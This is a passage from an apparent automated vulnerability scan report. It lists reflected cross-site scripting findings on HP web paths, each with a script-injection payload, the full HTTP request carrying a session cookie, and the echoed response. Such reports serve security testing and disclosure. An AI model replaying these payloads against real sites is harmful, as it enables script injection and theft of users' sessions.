Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30892


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics706b0"><script>alert(1)</script>aeaafebd9d9/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.54. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb321"><script>alert(1)</script>cb8c8ea3085 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics/cmdatatagutils.jscb321"><script>alert(1)</script>cb8c8ea3085?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30553


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.jscb321"><script>alert(1)</script>cb8c8ea3085?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.55. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175cc"><script>alert(1)</script>017088e4729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources175cc"><script>alert(1)</script>017088e4729/scripts/coremetrics/v40/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources175cc"><script>alert(1)</script>017088e4729/scripts/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.56. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa671"><script>alert(1)</script>0c8dbad185f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsfa671"><script>alert(1)</script>0c8dbad185f/coremetrics/v40/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfa671"><script>alert(1)</script>0c8dbad185f/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.57. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47497"><script>alert(1)</script>2129490ee66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics47497"><script>alert(1)</script>2129490ee66/v40/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:09 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30985


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics47497"><script>alert(1)</script>2129490ee66/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.58. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4fd"><script>alert(1)</script>a8ac50bab5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics/v40ce4fd"><script>alert(1)</script>a8ac50bab5b/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:11 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40ce4fd"><script>alert(1)</script>a8ac50bab5b/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.59. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35bd7"><script>alert(1)</script>6000b59c9da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics/v40/eluminate.js35bd7"><script>alert(1)</script>6000b59c9da?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:12 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js35bd7"><script>alert(1)</script>6000b59c9da?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.60. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bd8"><script>alert(1)</script>7215cf1e60b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcese3bd8"><script>alert(1)</script>7215cf1e60b/scripts/dragdrop.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:55 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30756


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcese3bd8"><script>alert(1)</script>7215cf1e60b/scripts/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.61. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ab1"><script>alert(1)</script>1956d4d9dbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts20ab1"><script>alert(1)</script>1956d4d9dbf/dragdrop.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:56 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30655


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts20ab1"><script>alert(1)</script>1956d4d9dbf/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.62. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd15a"><script>alert(1)</script>a3a4eb3735f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/dragdrop.jsbd15a"><script>alert(1)</script>a3a4eb3735f?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/dragdrop.jsbd15a"><script>alert(1)</script>a3a4eb3735f?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.63. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/effects.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9cc"><script>alert(1)</script>64d1b4e31c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources6e9cc"><script>alert(1)</script>64d1b4e31c2/scripts/effects.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30928


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources6e9cc"><script>alert(1)</script>64d1b4e31c2/scripts/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.64. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/effects.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e71"><script>alert(1)</script>a466e2d5896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts31e71"><script>alert(1)</script>a466e2d5896/effects.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30657


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts31e71"><script>alert(1)</script>a466e2d5896/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.65. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/effects.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 515ba"><script>alert(1)</script>8c0eede2f57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/effects.js515ba"><script>alert(1)</script>8c0eede2f57?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30871


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/effects.js515ba"><script>alert(1)</script>8c0eede2f57?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.66. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/powered_utils.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c727"><script>alert(1)</script>83474b9d897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources8c727"><script>alert(1)</script>83474b9d897/scripts/powered_utils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:22 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30724


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
